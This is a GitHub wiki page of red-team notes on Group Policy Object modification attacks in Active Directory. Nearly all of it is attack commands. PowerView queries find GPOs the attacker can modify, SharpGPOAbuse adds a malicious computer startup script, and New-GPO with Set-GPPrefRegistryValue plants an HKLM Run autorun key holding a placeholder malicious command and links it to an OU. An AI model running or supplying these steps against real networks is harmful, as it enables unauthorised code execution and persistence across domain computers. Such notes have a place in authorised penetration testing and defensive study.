GPO Modification attacks - CraigDonkin/Infrastructure GitHub Wiki
Get-DomainGPO
- Enumerate GPOs where the principal has modify privileges.
Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "CreateChild|WriteProperty" }
- Resolve the GPO name and SID
Get-DomainGPO -Identity "<objectDN>"
ConvertFrom-SID <SID>
- Enumerate the OU and computers that the GPO is applied to
Get-DomainOU -GPLink "<GUID>"
Get-DomainComputer -SearchBase "<Distinguished name of OU>"
https://github.com/FSecureLABS/SharpGPOAbuse
SharpGPOAbuse <AttackType> <AttackOptions>
- Example Computer Startup Script
SharpGPOAbuse.exe --AddComputerScript --ScriptName StartupScript.bat --ScriptContents "<malicous command to run>" --GPOName "<GPONAME>"
- Example ScriptContents to run a file on a share
Start /b <filepath>.exe
-
Look for users/groups who can create new GPOs in the domain.
- Create groupPolicyContainer objects
-
When a GPO is created it needs to be linked to an OU via write gPlink privileges
- If the PowerShell RSAT module is installed, can use the
New-GPOcmdlet to create a GPO that adds a HKLM autorun key.
New-GPO -Name <name>
Set-GPPrefRegistryValue -name <name of GPO> -Context Computer -Action Create -Key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" -ValueName "Updater" -Value <malicious command to run> -Type ExpandString
- Example malicious command:
C:\Windows\System32\cmd.exe /c <malicious payload>
- Link the GPO
Get-GPO -Name <name of GPO> | New-GPLink -Target "<OU>"